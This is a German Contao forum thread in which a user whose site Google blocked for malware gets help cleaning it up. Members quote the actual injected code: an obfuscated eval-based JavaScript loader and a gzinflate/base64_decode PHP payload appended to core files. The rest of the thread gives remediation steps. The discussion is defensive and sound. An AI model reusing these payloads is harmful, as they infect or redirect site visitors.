Google hat mir die WebSite gesperrt

**JeanetteS** · 27.03.2012, 08:37

Hallo Contaos,

nun habe ich endlich zwei Webprojekte so gut wie fertig (meine Ersten Contao-Works) und bin damit schon ziemlich zufrieden.

Dann kommt Google und legt mir Alles wieder lahm, weil mir unterstellt wird, Malware und Viren zu verbreiten.

Nach Absprache mit meinem Webhoster (www.webhoster.de) habe ich alle Installationsordner komplett vom Server auf den PC
heruntergeladen und mit AVIRA und MICROSOFT SECURITY ESSENTIALS überprüft: SAUBER!

Dann habe ich nochmal den Contao-Check gemacht, der VOR der Programmierung zu 100% GRÜN war, nun zeigt er mir folgendes Bild:

contao-check_27.03.12.JPG

Mein Contao läuft in der aktuellen Version 2.11.2 auch mein FTP (File-Zilla) ist aktuell, Avira ist Tagesaktuell und M-Security Essentials sind auch Tagesaktuell.

Google findet im Verzeichnis NICHT den implementierten Code, sodass ich Google nicht mal bitten kann, die Site wieder freizugeben.

Ich bin ziemlich ratlos und frage auch hier, wie ich meine Verzeichnisse auf dem Server gegen Eindringlinge konsequent schützen kann.

Ich danke Euch für einfach verständliche Lösungsvorschläge.

LG Jeanette

Die Webprojekte: www.dielichtformer.de (von Google gesperrt) und www.ferienhausbelgien.eu (wieder frei)

***lucina*** · 27.03.2012, 08:48

Ich bekomme da ebenfalls eine Warnung, die nicht gut ausschaut:lichtformer.PNG
Passt das von Dir eingesetzte Checktool zur hochgeladenen Contao-Version?
Sind die mit 'Corrupt' gekennzeichneten Dateien von Dir geändert worden?

Carolina.

(Meine Meinung zu Avira und MSSE ist, dass man da eigentlich auch Nimm2 lutschen kann.)

***Nina*** · 27.03.2012, 08:48

Wenn dir der Check zeigt, dass die Dateien "corrupt" sind, wurde vermutlich darin unerwünschter Code eingebracht. Hast du sie nochmal heruntergeladen und mal mit den frischen Install-Daten (einfach Contao-Paket von contao.org herunterladen) verglichen? Dann müsstest du ja schnell sehen können, welcher Code da hinzugefügt wurde.

**psren** · 27.03.2012, 08:49

Hallo,

poste mal bitte den Inhalt der rot markierten Dateien (am besten als Gist oder so).
Ersetze sie anschließend durch die Dateien aus einem neu heruntergaldenen orgina-Archiv von Contao (achte auf die richtige Version).

Dann sollten die Dateien wieder stimmen. Ob es irgendwo ein Sicherheitsloch gab sehen wir dann je nach dem was sich für Code / ob sich Code in den Dateien versteckt, der dort nicht hingehört!

//Edit: Wow, alle auf einmal, nur ich bin wieder mal zu lahm :-)

**Juggalo4u** · 27.03.2012, 08:52

Schaut definitiv nach Code-Infektion aus.

**JeanetteS** · 27.03.2012, 08:54

Liebe Damen,

es würde mir vermutlich mehr helfen, wenn man mir Alternativen zu den bemängelten Virenscannern aufzeigen würde, als sie nur zu bewerten. Danke!

Auch die nächste Hilfe ist mir keine wirkliche Hilfe. Was soll ich Wo vergleichen? Ich bin Contao-Newbie und bin schon 56 (brauche aber noch keinen Krückstock,
nur konkretere Hilfe) ;-)
Danke!

LG Jeanette

**psren** · 27.03.2012, 08:54

Ja, Seite ist kompromittiert!

d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new"qwe".prototype}catch( qqq){zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+' m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5 ~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5 ~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~5

[...]

3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=587 ;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);

Die Dateien die dir der Contao-Check als rot markiert solltest du mit orginal-Dateien vergleichen oder deren Quellcode posten, so dass man sich den anschauen kann.

**Juggalo4u** · 27.03.2012, 09:04

Konkreter:

In mehrere Dateien wurde Maleware-Code eingeschmuggelt.
Das Problem ist übrigens noch bei beiden Seiten vorhanden!

Beheben: Alle veränderten /rot markierten Dateien mit den originalen ersetzen.

Das behebt natürlich noch nicht die Sicherheitslücke durch die das Problem entstanden ist.

**tl_richard_user** · 27.03.2012, 09:06

Übrigens habe ich gerade die zweite Seite (FerienhausBelgien) aufgerufen; für einen kurzen Moment habe ich sie gesehen, dann kam ein Warnhinweis zu einer anderen URL. (Bei der anderen Seite kam die Meldung sofort.) Als würde eine "verseuchte" Seite eingebettet sein.

Zusatz: Es wäre nicht schlecht, wenn du die Dateien nicht einfach ersetzt, sondern uns zusätzlich eine Kopie der "verseuchten", rot markierten, Dateien anhängst. Dann kann man sich den Code mal angucken.

***lucina*** · 27.03.2012, 09:09

Zitat von JeanetteS

Liebe Damen,
es würde mir vermutlich mehr helfen, wenn man mir Alternativen zu den bemängelten Virenscannern aufzeigen würde, als sie nur zu bewerten. Danke!

Es ging mir eher darum Dir deutlich zu machen dass Du denen nicht unbedingt trauen kannst. Sorry, wenn das für Dich nicht hilfreich war. Der Contao-Check ist maßgeblich.

Zitat von JeanetteS

Auch die nächste Hilfe ist mir keine wirkliche Hilfe. Was soll ich Wo vergleichen? Ich bin Contao-Newbie und bin schon 56 (brauche aber noch keinen Krückstock,
nur konkretere Hilfe) ;-)
Danke!

LG Jeanette

Du solltest die Daten des Contao auf Deinem Webspace mit den Daten vergleichen, die Du beim Download von Contao erhältst (von Contao.org bzw. dem Downloadlink auf Sourceforge, zu dem Du beim Download weitergeleitet wirst.

Wobei dieser Vergleich aus meiner Sicht (und nach dem Posting des kompromittierten Quelltextes durch psren) jetzt obsolet ist.

Für mich wäre jetzt folgendes angesagt:

- Überprüfen deiner lokalen Daten (die Du dann ja irgendwann auf den Webspace geladen hast und die (hoffentlich) erst dort kompromittiert wurden . und die als Backup hoffentlich halbwegs aktuell sind
- Wenn die in Ordnung sind: Löschen von allem auf dem Webserver (also das komplette Verzeichnis und die Datenbank)
- Hochladen des lokalen, überprüften Backups

Wenn Du kein aktuelles, sauberes Backup hast, wäre der Austausch der als 'corrupt' markierten Daten mit denen aus dem oben erwähnten Installationspaket von Hand der Weg, den Du gehen solltest. Ggf. können fiese Einträge allerdings auch in der Datenbank stecken (indem beispielsweise ein Modul mit verschleiertem Code enthalten ist, oder auch im Inhalt von tl_files [hier wäre es denkbar, Schadcode innerhalb einer Grafik oder eines PDF unterzubringen ...). Nicht schön, und dann kaum zu finden.

Carolina.

(im Übrigen auch fast 50 und im gegensatz zu Dir mit Krückstock ...)

**JeanetteS** · 27.03.2012, 09:11

... und dieser Code wurde mir ab Zeile 141 drangehängt:

* Instantiate the controller
*/
$objIndex = new Index();
$objIndex->run();

#215d25#
echo(gzinflate(base64_decode("1VZLc5swEP4rLRcgjB1L IB5D1Et76blHjw/EhppMgm1Q6rE95rdXq5fxm2Z6aGdAMSvtft8+o6dmWpdL9mVGv 2UsT2e0ytefZo6bzulgmdVN/r1ijj1C2HYfSVoWzrqsZov1cLaYvr/lFXNZvdlxHWu1zq3hsl6wBdss8/00Y9O5s1qt3N12S+3s1U7h7y/b227TpqGWBcaQuyuoXdieXfN3wd83/n6d8yWr7bSgBf+CnRlfcjvd55TNy2ZcDJv354bVDkIuNzhJGbU 3fLuilj8kLbwEwTJqEWlR0gZJSwIuCGKQRrDAoSCBXwGXtBjz0 0YUtb4w4qvvk8MkBBSuAaIAtYGwCOp+rD6MBkdHsYBWFBKpJoR IGAAx5lBES0IwRZQnpx6R8BSCSwAFfuL4RDMELaQP+pK6JHYFp 1+sYokrSUUHV8MWJzeoIiIZwA6YwCYUBInI8ge84BiwCwvBikU ooYAD8BMUOBXJM9AwIIk0c2kAGQomTypu+kig0xZK4koozRFJT qdMIQurEKsIdg9+YF9m0xxGCgxpbOnpDQ3taNIpwU6gYmUrNCy 0xDf5ILIYBJYiKh6ZQ1klOmrGjnDFBBOOyaiA/fAQZJUOlXRpSzfKSLgWgztyI1JapCsVfvgjKJVOhi7VCz+Ewlu l3RUIdEk9iC/4g3o20eX2MyUi7IjJghPdXD1aJlAtI6RBN4Q3Z42eHzd6ykwSG aKRKNqwO8x0diPTs5DT6KR34+FJd8ryRP9Zg16KxFk74T/po6Mhdd5OMkw9EO93nEG633i9UY97szN2+pvodPFd/Y8U3flAPSq94wn5tyr9ymDuhfyh/5n/wv3CdJ94NCZX8nGnvgUxMA1z7urwtYbN8rVkjpW1lrmRuW5aLG qnpKO0/ExJHKWl57m7F1rCva9pvB+sLquf42LiDOYPDh4gDz1U45cJV9y LO+GKn4Lb4Xbr5o5leSs3fXpU99Tf")));
#/215d25#
?>

Wäre es richtig, wenn ich nun die betroffenen acht (rosa Zeilen aus dem Contao-Ceck) einfach wieder ersetze, damit dieser angehängte Code verschwindet?

Dann interessiert mich noch, wie ich mich vor Neu-Infizierungen schützen kann...?

Danke sehr für Eure kompetente Hilfe!

**tl_richard_user** · 27.03.2012, 09:18

Zitat von JeanetteS

Wäre es richtig, wenn ich nun die betroffenen acht (rosa Zeilen aus dem Contao-Ceck) einfach wieder ersetze, damit dieser angehängte Code verschwindet?

Ja, denn in diesen Dateien steht nichts webseitspezifisches, also keine Artikel, die du im Backend verfasst hast.

***Nina*** · 27.03.2012, 09:21

Allerdings löst das dein Problem noch nicht, da die Seite immer wieder infiziert werden könnte (siehe auch Wiki-Eintrag). Lies dir mal den Contao-Wiki-Eintrag genau durch, dort findest du wichtige Tipps was du nun tun solltest.

**JeanetteS** · 27.03.2012, 09:21

... meinst Du das so, Nina?

http://pastebin.de/24622

***Nina*** · 27.03.2012, 09:27

Ja, prima

***lucina*** · 27.03.2012, 09:27

Lade Dir ein sauberes Installationspaket der von Dir eingesetzten Version 2.11.2 herunter.

Lösche die betreffenden Dateien (also alle, die im Contao-Check als ROT markiert wurden per FTP.

Lade dieselben Dateien aus dem frischen Installationspaket per FTP hoch.

Überprüfe das Ergebnis mittels Contao-Checktool.

Dann schauen wir weiter - wobei ich mir vorstellen kann dass Du auf Deinen Rechner ein Problem hast ...

**Juggalo4u** · 27.03.2012, 09:40

Zitat von JeanetteS

... meinst Du das so, Nina?

http://pastebin.de/24622

PHP-Code:


#215d25#

echo(gzinflate(base64_decode("1VZLc5swEP4rLRcgjB1LIB5D1Et76blHjw/EhppMgm1Q6rE95rdXq5fxm2Z6aGdAMSvtft8+o6dmWpdL9mVGv2UsT2e0ytefZo6bzulgmdVN/r1ijj1C2HYfSVoWzrqsZov1cLaYvr/lFXNZvdlxHWu1zq3hsl6wBdss8/00Y9O5s1qt3N12S+3s1U7h7y/b227TpqGWBcaQuyuoXdieXfN3wd83/n6d8yWr7bSgBf+CnRlfcjvd55TNy2ZcDJv354bVDkIuNzhJGbU3fLuilj8kLbwEwTJqEWlR0gZJSwIuCGKQRrDAoSCBXwGXtBjz00YUtb4w4qvvk8MkBBSuAaIAtYGwCOp+rD6MBkdHsYBWFBKpJoRIGAAx5lBES0IwRZQnpx6R8BSCSwAFfuL4RDMELaQP+pK6JHYFp1+sYokrSUUHV8MWJzeoIiIZwA6YwCYUBInI8ge84BiwCwvBikUooYAD8BMUOBXJM9AwIIk0c2kAGQomTypu+kig0xZK4koozRFJTqdMIQurEKsIdg9+YF9m0xxGCgxpbOnpDQ3taNIpwU6gYmUrNCy0xDf5ILIYBJYiKh6ZQ1klOmrGjnDFBBOOyaiA/fAQZJUOlXRpSzfKSLgWgztyI1JapCsVfvgjKJVOhi7VCz+Ewlul3RUIdEk9iC/4g3o20eX2MyUi7IjJghPdXD1aJlAtI6RBN4Q3Z42eHzd6ykwSGaKRKNqwO8x0diPTs5DT6KR34+FJd8ryRP9Zg16KxFk74T/po6Mhdd5OMkw9EO93nEG633i9UY97szN2+pvodPFd/Y8U3flAPSq94wn5tyr9ymDuhfyh/5n/wv3CdJ94NCZX8nGnvgUxMA1z7urwtYbN8rVkjpW1lrmRuW5aLGqnpKO0/ExJHKWl57m7F1rCva9pvB+sLquf42LiDOYPDh4gDz1U45cJV9yLO+GKn4Lb4Xbr5o5leSs3fXpU99Tf")));

#/215d25#

Da ist der Übeltäter

**JeanetteS** · 27.03.2012, 10:01

So Ihr Lieben,

heute habe ich wieder viel gelernt und inzwischen sind auf beiden Domains die jeweils rot markierten Dateien des Contao-Checks per FTP ersetzt worden, ebenso das PW für mein FTP. Ein neuer Check zeigte keine Mängel mehr. Die angehängten Scripte hatte ich - dank Nina - auch schon gesehen, deshalb bin ich Eurem Rat gefolgt und habe die verseuchten Dateien durch saubere Dateien ersetzt. Zum Glück hatte ich noch eine frische 2.11.2-Version separat gespeichert.

Ihr habt mir sehr geholfen. D A N K E !!!

Nun muß ich nur noch - irgendwie - Google davon überzeugen, die Seiten freizuschalten.
UND ...
ich muß irgendwie versuchen mein CONTAO gegen weitere Code-Anhängsel zu schützen... *seufz*

Eine Webinfo sagte mir, dass sich diese Anhängsel selber, quasi automatisch, da anhängen, wo es möglich ist.

You made my day!

**psren** · 27.03.2012, 10:08

Zur Sicherheit würde ich auch noch die Backend-Zugänge zu Contao und das Installtool Passwort ändern. Auch wenn das wohl nicht der Punkt war würde ich da lieber zu viel machen als zu wenig :-)

***lucina*** · 27.03.2012, 10:09

Erstmal solltest Du versuchen, herauszubekommen, wie das Script auf Deinen Webspace gekommen ist.

- Was sagt Dein Webhoster dazu?
- Gibt es Logfiles, aus denen hervorgeht, wann dieser Code zum ersten mal zu tragen kam (z.B. Logs über weitergeleitete Seitenaufrufe)?
- Ist Dein eigener Rechner sauber? Verwendest Du dort die jeweils aktuelle Version?
- Was sagen alternative AV-Tools über Deinen Rechner? Es gibt von Kaspersky eine Trial unter www.kaspersky.com/de/trials, und der in letzter Zeit auch annehmbar bewertete Norton bietet das auch (http://de.norton.com/downloads-trial-norton-antivirus)
- Bleibt Deine Seite sauber, wenn Du sie heute mittag, heute Abend, morgen mit dem Checktool überprüfst?
- Liegen in Deinem Webspace ausser Contao noch andere Anwendungen?
- Sind Anwendungen anderer User, die auf dem selben Server liegen, ggf. ebenfalls betroffen?

Carolina.

**Juggalo4u** · 27.03.2012, 10:20

Ich hatte übrigens in diesem Jahr auch schon 2 solche Infektionen bei Kunden mit unterschiedlichen Ursachen.

In einem Fall betrieb der Kunde parallel einen Wordpress-Blog mit Sicherheitslücken.

Im 2.Fall hatte ich die Webseite mit einem Kollege zusammen erstellt.
Es hat sich dann rausgestellt, das er auf seinem Rechner einen Trojaner hatte und die FTP-Zugangsdaten dadurch ausgespäht wurden.

**tl_richard_user** · 27.03.2012, 10:25

Da könnte man doch leo glatt den Vorschlag machen, dass der Contao-Check direkt ins CMS integriert wird ((und eine Warnung im Backend erscheint, sobald eine Änderung bemerkt wurde)).

**psren** · 27.03.2012, 10:30

Zitat von tl_richard_user

Da könnte man doch leo glatt den Vorschlag machen, dass der Contao-Check direkt ins CMS integriert wird ((und eine Warnung im Backend erscheint, sobald eine Änderung bemerkt wurde)).

Das ergibt wenig Sinn, da des öfteren auch Dateien absichtlich verändert werden.

**ciaobello** · 27.03.2012, 14:21

Zitat von JeanetteS

Nun muß ich nur noch - irgendwie - Google davon überzeugen, die Seiten freizuschalten.
UND ...
ich muß irgendwie versuchen mein CONTAO gegen weitere Code-Anhängsel zu schützen... *seufz*

Zitat von Google Chrome; Safe Browsing, ganz unten:

Nächste Schritte:

Zur vorherigen Seite zurück
Falls Sie der Inhaber dieser Website sind, können Sie eine Überprüfung Ihrer Website hinsichtlich Malware beantragen. Benutzen Sie hierzu die Google Webmaster-Tools. Weitere Informationen über den Prüfprozess erhalten Sie in derWebmaster-Tools-Hilfe.

Es sieht fast so aus, dass Du Dir die Malaware von www(dot)just-tina(dot)de eingefangen hast.
Entferne mal den Link auf Deiner Startseite und füge den Link erst wieder ein, wenn auch diese Seite gereinigt und nicht mehr geblockt wird!

ciaobello

Edit: 15:35 Ortszeit, mit dem Firefox komm ich auch wieder auf die Seite dielichtformer.de ohne Hinweis (von Brasilien)
www(dot)just-tina(dot)de resp. justnow(dot)com(dot)au Zeigt es nun auch an aber es kommt noch ein Hinweis!

**Fulano** · 27.03.2012, 14:50

Hallo,

Zitat von JeanetteS

... ebenso das PW für mein FTP. .

dein FTP-Programm könnte auch eine Sicherheitslücke darstellen. Siehe dazu auch diesen Link.

Gruß, Fulano

**BugBuster** · 27.03.2012, 14:51

Zitat von tl_richard_user

Da könnte man doch leo glatt den Vorschlag machen, dass der Contao-Check direkt ins CMS integriert wird ((und eine Warnung im Backend erscheint, sobald eine Änderung bemerkt wurde)).

So etwas ähnliches schwebt mir schon einige Zeit im Kopf rum, aber als BE Modul welches per Hand oder auch per Contao-Cron aufgerufen werden kann (daily).
Untersuchung bestimmter Files (nicht aller) per Checksumme, diese kann auch selber generiert werden (nach Update, Handänderungen etc.), erstmalig per runonce automatisch.

Nach "bösen" Code Schnippseln hatte ich auch schon überlegt, aber Befehle wie gzinflate oder base64_decode kommen auch in Contao selbst vor, wenn auch nur in bestimmten Dateien.(bisher)

**xtra** · 27.03.2012, 16:47

Die Idee zu einem Tripwire4Contao hatte ich auch schon, die Frage ist jedoch, wie genau man da die Regeln setzen soll, da wie du bereits sagtest, die Befehle nicht allgemein geblockt werden sollten/koennen.

Wenn der core sie nicht verwendet, so manche Erweiterung tut dies definitiv.

**Thomas** · 27.03.2012, 17:04

Ich fasse mal ganz kurz zusammen, was man in so einem Fall unternimmt, damit Du einen kleinen roten Faden bekommst!

1. Zugangsdaten ändern und zwar alle, sowohl die vom Webspace, als auch die von Contao,Datenbanken usw., bei eigenen Servern auch ROOT-Passwörter, User etc.
2. Seite(n) vom Netz nehmen und Dateien kontrollieren (Contao-Check, Prüfsummen, Dateigrößen)
3. Log-Dateien auswerten, es werden bei aktivierten Logs immer Spuren hinterlassen. Wenn man das nicht selber kann, Hilfe organisieren oder Anbieter behelligen
4. nicht einfach mit Standardaussagen des Anbieters abspeisen lassen, die sollten ein erhebliches Interesse daran haben, ihre Server sauber zu halten, somit auch den Willen, die Übeltäter zu finden
5. Anzeige gegen Unbekannt, hilft zwar nicht beim Finden der Lücke, aber es wird bekannt und beschäftigt auch andere damit, es könnte ja mal sein, dass der böse Bube ausfindig gemacht wird

Bedenke:
Es muss nicht zwingend an Deiner Installation liegen! Vor allem nicht dann, wenn man sich den Server mit vielen anderen Seiten teilen muss. Hier kann auch bei Kunde XYZ eine Installation vorliegen, die dem bösen Buben Tür und Tor öffnet. Du als Ahnungsloser, Sicherheits denkender Anwender bist dann *mit gehangen, mit gefangen*.
So etwas macht immer viel Arbeit.

Wie erwähnt würde ich in jedem Fall die Seite erst mal vom Netz nehmen. Denn auch Du kannst mächtig Ärger bekommen, sollte sich die Verbreitung über Deine Seite heraus stellen.
Erst die Seite wieder Online nehmen, wenn die Sachverhalte geklärt sind und das System sauber ist.

Entwicklung immer in sicheren Umgebungen erstellen, z.B. Passwort gesichert.
Die Meisten nehmen dafür XAMPP oder Contao2Go und installieren sich das Lokal. Erst wenn die Seite spruchreif ist, geht man damit Online.

**DortjeLoos** · 28.03.2012, 09:40

Zur Malewarebeseitigung.

1. Stelle sicher das alle Rechner die einen FTP Account zum System haben frei von jeglicher Art Maleware sind. (Prüf mal mit animalware, normale Virenscanner sind da manchmal Blind).
2. FTP und E-Mailpasswörter ändern.
3. Datenbankdump ziehen
4. Datenbank auf kompromitation prüfen (JS Code besonders beachten).
5. altes Template Backup
6. Template auf evt. JS Code prüfen.
7. Shop neu hochladen
8. Template hochladen
9. Homepage prüfen.
10. Google Webmastertools anmelden
11. Neuprüfung beantragen
12. Nach der Freischaltung freuen.

Du kannst das entweder selbst machen oder es an einen Dienstleister auslagern. Wir haben da einen Spezi [Kontaktdaten entfernt. Weiß der Herr, dass Du seine Kontaktdaten in einem öffentlichen Forum postest?] Bei uns haben die das für einen Stundenlohn von 200€ innerhalb von 1 Stunde erledigt.